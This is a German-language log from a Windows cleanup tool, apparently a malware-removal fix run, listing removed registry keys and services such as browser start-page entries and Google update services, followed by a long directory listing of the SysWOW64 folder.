HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalError => Schlüssel erfolgreich entfernt
HKCR\CLSID\{B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => Schlüssel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalPartiallyBackedUp => Schlüssel erfolgreich entfernt
HKCR\CLSID\{95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => Schlüssel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalToBackup => Schlüssel erfolgreich entfernt
HKCR\CLSID\{2CDD871E-60EB-40BD-9721-A1CB57042F75} => Schlüssel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalBackedUp => Schlüssel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => Schlüssel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalError => Schlüssel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => Schlüssel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalPartiallyBackedUp => Schlüssel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => Schlüssel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalToBackup => Schlüssel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{2CDD871E-60EB-40BD-9721-A1CB57042F75} => Schlüssel nicht gefunden. 
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C01A2B73-D42B-46F8-AFF0-E5207570AE93} => Schlüssel erfolgreich entfernt
HKCR\CLSID\{C01A2B73-D42B-46F8-AFF0-E5207570AE93} => Schlüssel nicht gefunden. 
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Wert erfolgreich entfernt
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Schlüssel nicht gefunden. 
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => Wert erfolgreich entfernt
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => Schlüssel nicht gefunden. 
 MicrosoftCRLSrv => Dienst nicht gefunden.
 MicrosoftCRLSrv => Dienst nicht gefunden.
HKLM\System\CurrentControlSet\Services\Avira Secure Backup Crawler => Schlüssel erfolgreich entfernt
Avira Secure Backup Crawler => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\gupdate => Schlüssel erfolgreich entfernt
gupdate => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\gupdatem => Schlüssel erfolgreich entfernt
gupdatem => Dienst erfolgreich entfernt
SNP2UVC => Dienst konnte nicht gestoppt werden.
HKLM\System\CurrentControlSet\Services\SNP2UVC => Schlüssel erfolgreich entfernt
SNP2UVC => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\clwvd => Schlüssel erfolgreich entfernt
clwvd => Dienst erfolgreich entfernt

========================= folder: C:\Windows\SysWOW64\1111 ========================

C:\Windows\SysWOW64\1111 => Datei

====== Ende von Folder: ======


========================= folder: C:\Users\Markus\AppData\Local\{991DAACD-0AC8-4F88-9A36-26B7D28A3D35} ========================


====== Ende von Folder: ======


========================= folder: C:\Users\Markus\AppData\Local\{D1FF043E-E888-4F8C-890F-409848E25675} ========================


====== Ende von Folder: ======


========= dir C:\Windows\SysWOW64 =========

 Datentr„ger in Laufwerk C: ist System
 Volumeseriennummer: 3ADE-27E0

 Verzeichnis von C:\Windows\SysWOW64

21.05.2017  19:45    <DIR>          .
21.05.2017  19:45    <DIR>          ..
06.01.2012  19:52    <DIR>          0407
03.05.2017  14:34                 0 11
17.05.2017  14:15                 0 1111
03.05.2017  14:35                 0 1111111
10.06.2009  23:16             2.151 12520437.cpx
10.06.2009  23:16             2.233 12520850.cpx
21.04.2017  11:29                 0 22
21.04.2017  07:25                 0 44
21.11.2010  05:24         3.727.872 accessibilitycpl.dll
14.07.2009  03:03            39.424 ACCTRES.dll
14.07.2009  03:14             7.680 acledit.dll
14.07.2009  03:14           125.440 aclui.dll
21.11.2010  05:24            45.568 acppage.dll
21.11.2010  05:25           744.448 ActionCenter.dll
21.11.2010  05:25           537.600 ActionCenterCPL.dll
21.11.2010  05:24           202.752 activeds.dll
14.07.2009  01:37           111.616 activeds.tlb
21.11.2010  05:24           309.760 actxprxy.dll
14.07.2009  03:14            38.912 AdapterTroubleshooter.exe
21.11.2010  05:25           438.272 AdmTmpl.dll
04.03.2014  11:17            49.664 adprovider.dll
21.11.2010  05:24           186.880 adsldp.dll
14.07.2009  03:14           202.752 adsldpc.dll
12.09.2016  22:49            76.800 adsmsext.dll
14.07.2009  03:14           260.608 adsnt.dll
28.04.2017  02:32           690.688 adtschema.dll
21.11.2010  05:31    <DIR>          AdvancedInstallers
28.04.2017  02:32           644.096 advapi32.dll
14.07.2009  03:14           126.464 advpack.dll
14.07.2009  03:14             6.656 aecache.dll
14.07.2009  03:03            23.040 aeevts.dll
14.07.2009  03:14            46.592 AltTab.dll
13.07.2009  23:04            18.432 amcompat.tlb
21.11.2010  05:24            70.656 amstream.dll
14.07.2009  03:14            24.064 amxread.dll
14.07.2009  03:14         1.739.776 apds.dll
18.01.2017  17:35            11.616 api-ms-win-core-file-l1-2-0.dll
18.01.2017  17:35            11.616 api-ms-win-core-file-l2-1-0.dll
18.01.2017  17:35            14.176 api-ms-win-core-localization-l1-2-0.dll
18.01.2017  17:35            12.128 api-ms-win-core-processthreads-l1-1-1.dll
18.01.2017  17:35            12.128 api-ms-win-core-synch-l1-2-0.dll
18.01.2017  17:35            11.616 api-ms-win-core-timezone-l1-1-0.dll
18.01.2017  17:35            11.616 api-ms-win-core-xstate-l2-1-0.dll
18.01.2017  17:35            12.640 api-ms-win-crt-conio-l1-1-0.dll
18.01.2017  17:35            15.712 api-ms-win-crt-convert-l1-1-0.dll
18.01.2017  17:35            12.128 api-ms-win-crt-environment-l1-1-0.dll
18.01.2017  17:35            13.664 api-ms-win-crt-filesystem-l1-1-0.dll
18.01.2017  17:35            12.640 api-ms-win-crt-heap-l1-1-0.dll
18.01.2017  17:35            12.128 api-ms-win-crt-locale-l1-1-0.dll
18.01.2017  17:35            22.368 api-ms-win-crt-math-l1-1-0.dll
18.01.2017  17:35            19.808 api-ms-win-crt-multibyte-l1-1-0.dll
18.01.2017  17:35            66.400 api-ms-win-crt-private-l1-1-0.dll
18.01.2017  17:35            12.640 api-ms-win-crt-process-l1-1-0.dll
18.01.2017  17:35            16.224 api-ms-win-crt-runtime-l1-1-0.dll
18.01.2017  17:35            17.760 api-ms-win-crt-stdio-l1-1-0.dll
18.01.2017  17:35            17.760 api-ms-win-crt-string-l1-1-0.dll
18.01.2017  17:35            14.176 api-ms-win-crt-time-l1-1-0.dll
18.01.2017  17:35            12.128 api-ms-win-crt-utility-l1-1-0.dll
14.07.2009  03:14            15.360 apilogen.dll
14.07.2009  03:14           221.184 apircl.dll
28.04.2017  02:32             6.656 apisetschema.dll
29.10.2015  19:49           295.936 apphelp.dll
14.07.2009  03:14            29.696 Apphlpdm.dll
28.04.2017  02:32            50.688 appidapi.dll
14.07.2009  03:14           203.264 AppIdPolicyEngineApi.dll
14.07.2009  03:14           149.504 appmgmts.dll
21.11.2010  05:25           339.968 appmgr.dll
21.11.2010  05:24           649.216 appwiz.cpl
14.07.2009  03:14           200.192 apss.dll
14.07.2009  05:20    <DIR>          ar-SA
14.07.2009  03:14            20.992 ARP.EXE
14.07.2009  03:03             2.048 asferror.dll
26.03.2017  20:33            28.344 aspnet_counters.dll
07.03.2017  18:17            67.584 asycfilt.dll
14.07.2009  03:14            24.064 at.exe
14.07.2009  03:14            29.184 AtBroker.exe
14.07.2009  03:14            70.144 atl.dll
11.06.2011  02:58           138.056 atl100.dll
10.03.2017  18:27           308.456 atmfd.dll
10.03.2017  17:53            34.304 atmlib.dll
14.07.2009  03:14            16.384 attrib.exe
21.11.2010  05:25           243.712 audiodev.dll
14.06.2016  17:21           374.784 AudioEng.dll
14.06.2016  17:21           442.368 AUDIOKSE.dll
14.06.2016  17:21           195.072 AudioSes.dll
14.07.2009  03:14           217.088 AuditNativeSnapIn.dll
28.04.2017  02:11            50.176 auditpol.exe
14.07.2009  03:14            55.296 AuditPolicyGPInterop.dll
14.07.2009  03:03            95.232 auditpolmsg.dll
14.07.2009  03:14           334.336 authfwcfg.dll
14.07.2009  03:14           297.472 AuthFWGP.dll
21.11.2010  05:24         5.066.752 AuthFWSnapin.dll
14.07.2009  03:20           126.976 AuthFWWizFwk.dll
09.11.2016  18:17         1.806.848 authui.dll
14.07.2009  03:14            98.816 authz.dll
21.11.2010  05:23           668.160 autochk.exe
21.11.2010  05:23           679.424 autoconv.exe
21.11.2010  05:23           658.944 autofmt.exe
21.11.2010  05:24           146.944 autoplay.dll
14.07.2009  03:14           119.808 AuxiliaryDisplayApi.dll
21.11.2010  05:25           665.600 AuxiliaryDisplayCpl.dll
14.07.2009  03:14            65.024 avicap32.dll
21.11.2010  05:24            91.648 avifil32.dll
14.07.2009  03:14            14.336 avrt.dll
10.06.2009  23:21            41.587 azman.msc
21.11.2010  05:23           762.880 azroles.dll
21.11.2010  05:24           314.368 azroleui.dll
21.11.2010  05:23            28.160 AzSqlExt.dll
21.11.2010  05:24           144.768 basecsp.dll
21.11.2010  05:23           740.864 batmeter.dll
28.04.2017  02:32            82.944 bcrypt.dll
12.05.2016  15:04           249.352 bcryptprimitives.dll
14.07.2009  03:14            74.240 bdaplgin.ax
14.07.2009  05:20    <DIR>          bg-BG
14.07.2009  03:14            34.304 bidispl.dll
14.07.2009  03:14           171.520 BioCredProv.dll
21.11.2010  05:24           186.368 bitsadmin.exe
21.11.2010  05:24            19.456 bitsperf.dll
14.07.2009  03:14            10.752 bitsprx2.dll
14.07.2009  03:14            10.240 bitsprx3.dll
14.07.2009  03:14             9.216 bitsprx4.dll
14.07.2009  03:14            18.432 bitsprx5.dll
14.07.2009  03:14            10.240 bitsprx6.dll
14.06.2016  17:21           744.960 blackbox.dll
10.06.2009  23:44         3.170.304 boot.sdi
14.07.2009  03:14            81.408 bootcfg.exe
14.07.2009  03:26            21.584 BOOTVID.DLL
10.06.2009  23:30            22.984 bopomofo.uce
04.07.2012  23:14            41.984 browcli.dll
21.11.2010  05:24            10.752 browseui.dll
21.11.2010  05:24           692.736 bthprops.cpl
14.07.2009  03:14            35.328 bthudtask.exe
14.07.2009  03:15            66.560 btpanui.dll
21.11.2010  05:25           878.592 Bubbles.scr
14.07.2009  03:15            64.000 BWContextHandler.dll
14.07.2009  03:15            10.752 BWUnpairElevated.dll
21.11.2010  05:24            73.216 cabinet.dll
21.11.2010  05:24           132.608 cabview.dll
14.07.2009  03:14            25.600 cacls.exe
21.11.2010  05:25           776.192 calc.exe
04.03.2014  11:17            48.128 capiprovider.dll
14.07.2009  03:15            19.968 capisp.dll
14.07.2009  04:35    <DIR>          catroot
14.07.2009  04:35    <DIR>          catroot2
14.07.2009  03:15           449.024 catsrv.dll
14.07.2009  03:15            24.064 catsrvps.dll
11.11.2015  20:39           487.936 catsrvut.dll
21.11.2010  05:25            66.560 cca.dll
26.06.2006  15:58         1.929.216 cdintf250.dll
05.06.2014  10:45         7.235.584 cdintf500.dll
21.04.2017  17:15           805.376 cdosys.dll
07.12.2012  12:46            55.296 cero.rs
28.04.2017  02:32           342.528 certcli.dll
14.07.2009  03:15           122.880 certCredProvider.dll
13.05.2013  05:08            43.008 certenc.dll
21.11.2010  05:24         1.334.272 CertEnroll.dll
14.07.2009  03:14            67.072 CertEnrollCtrl.exe
14.07.2009  03:15           271.872 CertEnrollUI.dll
21.11.2010  05:23         1.555.456 certmgr.dll
10.06.2009  23:36            63.070 certmgr.msc
21.11.2010  05:24            65.024 CertPolEng.dll
14.07.2009  03:14           263.168 certreq.exe
13.05.2013  05:08           903.168 certutil.exe
02.06.2015  01:47           210.432 cewmdm.dll
14.07.2009  03:15            48.640 cfgbkend.dll
06.01.2012  14:09           145.920 cfgmgr32.dll
12.08.2005  12:09           607.432 Cfx4032.ocx
11.10.2016  17:18           125.952 chajei.ime
30.10.2014  03:45           155.136 charmap.exe
14.07.2009  01:15            11.776 chcp.com
14.07.2009  03:14            16.384 chkdsk.exe
14.07.2009  03:14            16.896 chkntfs.exe
14.07.2009  03:14            29.696 choice.exe
14.07.2009  03:15         1.672.192 chsbrkr.dll
14.07.2009  03:15         6.103.040 chtbrkr.dll
14.07.2009  03:15            10.752 CHxReadingStringIME.dll
14.07.2009  03:15           172.544 cic.dll
11.10.2016  17:18           125.952 cintlgnt.ime
14.07.2009  03:14            37.376 cipher.exe
14.07.2009  03:15            13.824 clb.dll
14.07.2009  03:15           522.240 clbcatq.dll
14.07.2009  03:14           212.480 cleanmgr.exe
04.03.2015  06:10            58.880 clfsw32.dll
14.07.2009  03:15            86.016 cliconfg.dll
14.07.2009  03:14            45.056 cliconfg.exe
14.07.2009  02:12            40.960 cliconfg.rll
14.07.2009  03:14            26.112 clip.exe
21.11.2010  05:24           230.912 clusapi.dll
14.07.2009  03:15            36.864 cmcfg32.dll
21.11.2010  05:24           302.592 cmd.exe
14.07.2009  03:15           484.352 cmdial32.dll
14.07.2009  03:14            13.824 cmdkey.exe
14.07.2009  03:14            72.704 cmdl32.exe
14.07.2009  03:15            64.512 cmicryptinstall.dll
14.07.2009  03:15            68.608 cmifw.dll
14.07.2009  03:15           304.640 cmipnpinstall.dll
14.07.2009  03:15            34.304 cmlua.dll
14.07.2009  03:14            43.008 cmmon32.exe
14.07.2009  03:15            26.112 cmpbk32.dll
21.11.2010  05:24            84.992 cmstp.exe
14.07.2009  03:15            15.360 cmstplua.dll
14.07.2009  03:15            47.104 cmutil.dll
14.07.2009  03:15            12.288 cngaudit.dll
04.03.2014  11:17            51.200 cngprovider.dll
14.07.2009  03:15            32.768 cnvfat.dll
07.12.2012  12:46            40.960 cob-au.rs
14.07.2009  03:15            63.488 colbact.dll
08.12.2015  23:53           153.600 COLORCNV.DLL
14.07.2009  03:14            86.016 colorcpl.exe
14.07.2009  03:15           606.208 colorui.dll
08.11.2012  15:07    <DIR>          com
17.04.2017  16:54             7.168 comcat.dll
24.04.2015  19:56           530.432 comctl32.dll
15.04.2005  19:58         1.351.392 comctl32.ocx
21.11.2010  05:23           485.888 comdlg32.dll
10.06.2009  23:17           124.118 comexp.msc
14.07.2009  03:14            20.480 comp.exe
14.07.2009  03:14            18.432 compact.exe
10.06.2009  23:21           113.256 compmgmt.msc
10.06.2009  23:25            27.792 compobj.dll
14.07.2009  03:15           276.480 compstui.dll
14.07.2009  03:14            36.352 ComputerDefaults.exe
14.07.2009  03:15            89.088 comrepl.dll
14.07.2009  03:04         1.297.408 comres.dll
14.07.2009  03:15           220.160 comsnap.dll
11.11.2015  20:39         1.242.624 comsvcs.dll
14.07.2009  03:15           584.704 comuid.dll
14.07.2009  05:20    <DIR>          config
14.07.2009  03:15         1.344.512 connect.dll
14.07.2009  03:15            73.216 console.dll
14.07.2009  03:14           113.152 control.exe
14.07.2009  03:14            17.408 convert.exe
22.01.2016  08:04           642.048 CPFilters.dll
28.04.2017  02:32            17.408 credssp.dll
04.10.2013  03:56           168.960 credui.dll
14.07.2009  03:14            28.160 credwiz.exe
14.07.2009  03:15           149.019 crtdll.dll
12.04.2017  17:25         1.176.064 crypt32.dll
28.04.2017  02:07            36.352 cryptbase.dll
10.05.2013  05:20            24.576 cryptdlg.dll
14.07.2009  03:15            58.880 cryptdll.dll
14.07.2009  03:15            55.296 cryptext.dll
12.04.2017  17:25           106.496 cryptnet.dll
14.06.2016  17:21            80.896 cryptsp.dll
12.04.2017  17:25           145.920 cryptsvc.dll
14.06.2016  17:21         1.005.056 cryptui.dll
14.07.2009  03:15            85.504 cryptxml.dll
01.05.2013  08:40    <DIR>          cs-CZ
21.11.2010  05:24            34.816 cscapi.dll
21.11.2010  05:24            23.040 cscdll.dll
21.11.2010  05:24           139.264 cscobj.dll
12.10.2013  03:15           126.976 cscript.exe
07.12.2012  12:46            43.520 csrr.rs
07.12.2011  01:55            53.248 CSVer.dll
14.07.2009  03:14             8.704 ctfmon.exe
14.07.2009  03:15            27.136 ctl3d32.dll
14.07.2009  03:14           309.248 cttune.exe
14.07.2009  03:14            36.352 cttunesvr.exe
10.06.2009  23:48            66.082 C_037.NLS
10.06.2009  23:48            66.082 C_10000.NLS
10.06.2009  23:48           162.850 C_10001.NLS
10.06.2009  23:48           195.618 C_10002.NLS
10.06.2009  23:48           177.698 C_10003.NLS
10.06.2009  23:48            66.082 C_10004.NLS
10.06.2009  23:48            66.082 C_10005.NLS
10.06.2009  23:48            66.082 C_10006.NLS
10.06.2009  23:48            66.082 C_10007.NLS
10.06.2009  23:48           173.602 C_10008.NLS
10.06.2009  23:48            66.082 C_10010.NLS
10.06.2009  23:48            66.082 C_10017.NLS
10.06.2009  23:48            66.082 C_10021.NLS
10.06.2009  23:48            66.082 C_10029.NLS
10.06.2009  23:48            66.082 C_10079.NLS
10.06.2009  23:48            66.082 C_10081.NLS
10.06.2009  23:48            66.082 C_10082.NLS
10.06.2009  23:48            66.082 C_1026.NLS
10.06.2009  23:48            66.082 C_1047.NLS
10.06.2009  23:48            66.082 C_1140.NLS
10.06.2009  23:48            66.082 C_1141.NLS
10.06.2009  23:48            66.082 C_1142.NLS
10.06.2009  23:48            66.082 C_1143.NLS
10.06.2009  23:48            66.082 C_1144.NLS
10.06.2009  23:48            66.082 C_1145.NLS
10.06.2009  23:48            66.082 C_1146.NLS
10.06.2009  23:48            66.082 C_1147.NLS
10.06.2009  23:48            66.082 C_1148.NLS
10.06.2009  23:48            66.082 C_1149.NLS
10.06.2009  23:48            66.082 C_1250.NLS
10.06.2009  23:48            66.082 C_1251.NLS
10.06.2009  23:48            66.082 C_1252.NLS
10.06.2009  23:48            66.082 C_1253.NLS
10.06.2009  23:48            66.082 C_1254.NLS
10.06.2009  23:48            66.082 C_1255.NLS
10.06.2009  23:48            66.082 C_1256.NLS
10.06.2009  23:48            66.082 C_1257.NLS
10.06.2009  23:48            66.082 C_1258.NLS
10.06.2009  23:48           189.986 C_1361.NLS
10.06.2009  23:48           180.258 C_20000.NLS
10.06.2009  23:48           186.402 C_20001.NLS
10.06.2009  23:48           173.602 C_20002.NLS
10.06.2009  23:48           185.378 C_20003.NLS
10.06.2009  23:48           180.258 C_20004.NLS
10.06.2009  23:48           187.938 C_20005.NLS
10.06.2009  23:48            66.082 C_20105.NLS
10.06.2009  23:48            66.082 C_20106.NLS
10.06.2009  23:48            66.082 C_20107.NLS
10.06.2009  23:48            66.082 C_20108.NLS
10.06.2009  23:48            66.082 C_20127.NLS
10.06.2009  23:48           139.810 C_20261.NLS
10.06.2009  23:48            66.082 C_20269.NLS
10.06.2009  23:48            66.082 C_20273.NLS
10.06.2009  23:48            66.082 C_20277.NLS
10.06.2009  23:48            66.082 C_20278.NLS
10.06.2009  23:48            66.082 C_20280.NLS
10.06.2009  23:48            66.082 C_20284.NLS
10.06.2009  23:48            66.082 C_20285.NLS
10.06.2009  23:48            66.082 C_20290.NLS
10.06.2009  23:48            66.082 C_20297.NLS
10.06.2009  23:48            66.082 C_20420.NLS
10.06.2009  23:48            66.082 C_20423.NLS
10.06.2009  23:48            66.082 C_20424.NLS
10.06.2009  23:48            66.082 C_20833.NLS
10.06.2009  23:48            66.082 C_20838.NLS
10.06.2009  23:48            66.082 C_20866.NLS
10.06.2009  23:48            66.082 C_20871.NLS
10.06.2009  23:48            66.082 C_20880.NLS
10.06.2009  23:48            66.082 C_20905.NLS
10.06.2009  23:48            66.082 C_20924.NLS
10.06.2009  23:48           180.770 C_20932.NLS
10.06.2009  23:48           173.602 C_20936.NLS
10.06.2009  23:48           177.698 C_20949.NLS
10.06.2009  23:48            66.082 C_21025.NLS
10.06.2009  23:48            66.082 C_21027.NLS
10.06.2009  23:48            66.082 C_21866.NLS
10.06.2009  23:48            66.082 C_28591.NLS
10.06.2009  23:48            66.082 C_28592.NLS
10.06.2009  23:48            66.082 C_28593.NLS
10.06.2009  23:48            66.082 C_28594.NLS
10.06.2009  23:48            66.082 C_28595.NLS
10.06.2009  23:48            66.082 C_28596.NLS
10.06.2009  23:48            66.082 C_28597.NLS
10.06.2009  23:48            66.082 C_28598.NLS
10.06.2009  23:48            66.082 C_28599.NLS
10.06.2009  23:48            66.082 c_28603.nls
10.06.2009  23:48            66.082 C_28605.NLS
10.06.2009  23:48            66.594 C_437.NLS
10.06.2009  23:48            66.082 C_500.NLS
10.06.2009  23:48            66.082 C_708.NLS
10.06.2009  23:48            66.594 C_720.NLS
10.06.2009  23:48            66.594 C_737.NLS
10.06.2009  23:48            66.594 C_775.NLS
10.06.2009  23:48            66.594 C_850.NLS
10.06.2009  23:48            66.594 C_852.NLS
10.06.2009  23:48            66.594 C_855.NLS
10.06.2009  23:48            66.594 C_857.NLS
10.06.2009  23:48            66.594 C_858.NLS
10.06.2009  23:48            66.594 C_860.NLS
10.06.2009  23:48            66.594 C_861.NLS
10.06.2009  23:48            66.594 C_862.NLS
10.06.2009  23:48            66.594 C_863.NLS
10.06.2009  23:48            66.594 C_864.NLS
10.06.2009  23:48            66.594 C_865.NLS
10.06.2009  23:48            66.594 C_866.NLS
10.06.2009  23:48            66.594 C_869.NLS
10.06.2009  23:48            66.082 C_870.NLS
10.06.2009  23:48            66.594 C_874.NLS
10.06.2009  23:48            66.082 C_875.NLS
10.06.2009  23:48           162.850 C_932.NLS
10.06.2009  23:48           196.642 C_936.NLS
10.06.2009  23:48           196.642 C_949.NLS
10.06.2009  23:48           196.642 C_950.NLS
14.07.2009  03:15           221.696 C_G18030.DLL
14.07.2009  03:15            10.240 C_IS2022.DLL
21.11.2010  05:23            11.264 C_ISCII.DLL
26.11.2013  10:16         3.419.136 d2d1.dll
01.05.2013  08:32         1.080.832 d3d10.dll
01.05.2013  08:32           220.160 d3d10core.dll
14.04.2016  15:49           603.648 d3d10level9.dll
30.07.2015  19:57         1.987.584 d3d10warp.dll
01.05.2013  08:32           161.792 d3d10_1.dll
01.05.2013  08:32           249.856 d3d10_1core.dll
26.04.2013  01:30         1.505.280 d3d11.dll
14.07.2009  03:15         1.036.800 d3d8.dll
14.07.2009  03:15            11.264 d3d8thk.dll
21.11.2010  05:24         1.828.352 d3d9.dll
12.07.2010  01:47         1.846.632 D3DCompiler_41.dll
04.09.2009  18:29         1.974.616 D3DCompiler_42.dll
14.07.2009  03:15           386.048 d3dim.dll
14.07.2009  03:15           817.664 d3dim700.dll
14.07.2009  03:15           593.920 d3dramp.dll
12.07.2010  01:47           453.456 d3dx10_41.dll
05.09.2009  03:29           453.456 d3dx10_42.dll
26.05.2010  11:41           470.880 d3dx10_43.dll
26.05.2010  11:41           248.672 d3dx11_43.dll
31.03.2006  13:40         2.388.176 d3dx9_30.dll
29.11.2006  23:06         3.426.072 d3dx9_32.dll
16.05.2007  17:45         3.497.832 d3dx9_34.dll
19.07.2007  19:14         3.727.720 d3dx9_35.dll
15.10.2008  07:22         4.379.984 D3DX9_40.dll
04.09.2009  18:29         1.892.184 D3DX9_42.dll
26.05.2010  11:41         1.998.168 D3DX9_43.dll
14.07.2009  03:15            53.760 d3dxof.dll
01.05.2013  08:40    <DIR>          da-DK
14.07.2009  03:15            17.408 dataclen.dll
08.09.2016  22:34            87.040 davclnt.dll
14.07.2009  03:15            19.456 davhlpr.dll
21.11.2010  05:24         2.522.624 dbgeng.dll
21.11.2010  05:24           854.016 dbghelp.dll
14.07.2009  03:15           135.168 dbnetlib.dll
14.07.2009  03:15            32.768 dbnmpntw.dll
14.07.2009  03:14           868.352 dccw.exe
10.03.2017  18:19            10.240 dciman32.dll
14.07.2009  03:14             8.704 dcomcnfg.exe
14.07.2009  03:15            15.360 DDACLSys.dll
06.06.2014  10:43         2.273.432 DDBACCPL.CPL
06.06.2014  10:43         1.659.544 DDBACCTM.CPL
14.07.2009  03:14            36.864 ddodiag.exe
14.07.2009  03:15            10.752 DDOIProxy.dll
14.07.2009  03:15         6.278.656 DDORes.dll
14.07.2009  03:15           531.968 ddraw.dll
14.07.2009  03:15            30.208 ddrawex.dll
06.01.2012  19:52    <DIR>          de
12.05.2017  17:54    <DIR>          de-DE
21.11.2010  05:25           220.672 defaultlocationcpl.dll
21.11.2010  05:24           128.000 desk.cpl
14.07.2009  03:15            47.616 deskadp.dll
14.07.2009  03:15            45.568 deskmon.dll
14.07.2009  03:15            39.936 deskperf.dll
08.12.2015  23:53            67.584 devenum.dll
21.11.2010  05:24           484.864 DeviceCenter.dll
14.07.2009  03:15            17.408 DeviceDisplayStatusManager.dll
14.07.2009  03:15            24.576 DeviceMetadataParsers.dll
14.07.2009  03:15           181.248 DevicePairing.dll
21.11.2010  05:24           211.456 DevicePairingFolder.dll
14.07.2009  03:15            79.360 DevicePairingHandler.dll
14.07.2009  03:15            55.296 DevicePairingProxy.dll
14.07.2009  03:14            71.168 DevicePairingWizard.exe
14.07.2009  03:14            91.648 DeviceProperties.exe
14.07.2009  03:15             9.728 DeviceUxRes.dll
10.06.2009  23:46           145.640 devmgmt.msc
14.07.2009  03:15           410.624 devmgr.dll
06.01.2012  14:09            64.512 devobj.dll
06.01.2012  14:09            44.544 devrtl.dll
21.11.2010  05:24           586.752 dfrgui.exe
14.07.2009  03:15            43.008 dfscli.dll
19.06.2014  00:23         1.131.664 dfshim.dll
14.07.2009  03:15            54.272 DfsShlEx.dll
14.07.2009  03:15            11.264 dhcpcmonitor.dll
21.11.2010  05:24           254.464 dhcpcore.dll
09.10.2012  19:40           193.536 dhcpcore6.dll
14.07.2009  03:15            61.952 dhcpcsvc.dll
09.10.2012  19:40            44.032 dhcpcsvc6.dll
14.07.2009  03:15            81.920 DHCPQEC.DLL
14.07.2009  03:15            79.360 dhcpsapi.dll
13.05.2011  12:16           493.056 dhRichClient3.dll
14.07.2009  03:14            31.744 dialer.exe
14.07.2009  03:14            94.720 diantz.exe
14.07.2009  03:15           315.904 difxapi.dll
14.07.2009  03:15            33.792 dimsjob.dll
04.03.2014  11:17            36.864 dimsroam.dll
14.07.2009  03:15           136.704 dinput.dll
14.07.2009  03:15           145.408 dinput8.dll
14.07.2009  01:15            13.824 diskcomp.com
14.07.2009  01:15            11.264 diskcopy.com
14.07.2009  03:15         1.502.720 diskcopy.dll
10.06.2009  23:47            47.679 diskmgmt.msc
21.11.2010  05:24           133.632 diskpart.exe
25.05.2015  20:00            17.408 diskperf.exe
21.11.2010  05:24           276.480 diskraid.exe
17.10.2016  07:43    <DIR>          Dism
14.07.2009  03:14           202.752 Dism.exe
14.07.2009  03:15            15.360 dispex.dll
21.11.2010  05:24         1.040.384 Display.dll
14.07.2009  03:14           522.752 DisplaySwitch.exe
07.12.2012  12:46            15.360 djctq.rs
14.07.2009  03:14             7.168 dllhost.exe
14.07.2009  03:14             7.168 dllhst3g.exe
14.07.2009  03:15            30.720 dmband.dll
14.07.2009  03:15            63.488 dmcompos.dll
14.07.2009  03:15           395.776 dmdlgs.dll
14.07.2009  03:15           199.680 dmdskmgr.dll
14.07.2009  03:04           372.224 dmdskres.dll
14.07.2009  03:04             2.048 dmdskres2.dll
14.07.2009  03:15           179.712 dmime.dll
14.07.2009  03:15            23.040 dmintf.dll
14.07.2009  03:15            38.400 dmloader.dll
14.07.2009  03:15            42.496 dmocx.dll
14.07.2009  03:15           111.616 dmrc.dll
14.07.2009  03:15            86.016 dmscript.dll
14.07.2009  03:15           105.984 dmstyle.dll
14.07.2009  03:15           105.472 dmsynth.dll
14.07.2009  03:15           101.376 dmusic.dll
14.07.2009  03:15            19.968 dmutil.dll
14.07.2009  03:15           145.920 dmvdsitf.dll
14.07.2009  03:14           110.080 dmview.ocx
06.01.2012  14:05           270.336 dnsapi.dll
06.01.2012  14:05            28.672 dnscacheugc.exe
21.11.2010  05:23           109.056 dnscmmc.dll
14.07.2009  03:15            37.376 docprop.dll
14.07.2009  03:14            15.872 doskey.exe
21.11.2010  05:24            91.136 dot3api.dll
21.11.2010  05:23            82.432 dot3cfg.dll
14.07.2009  03:15            47.104 dot3dlg.dll
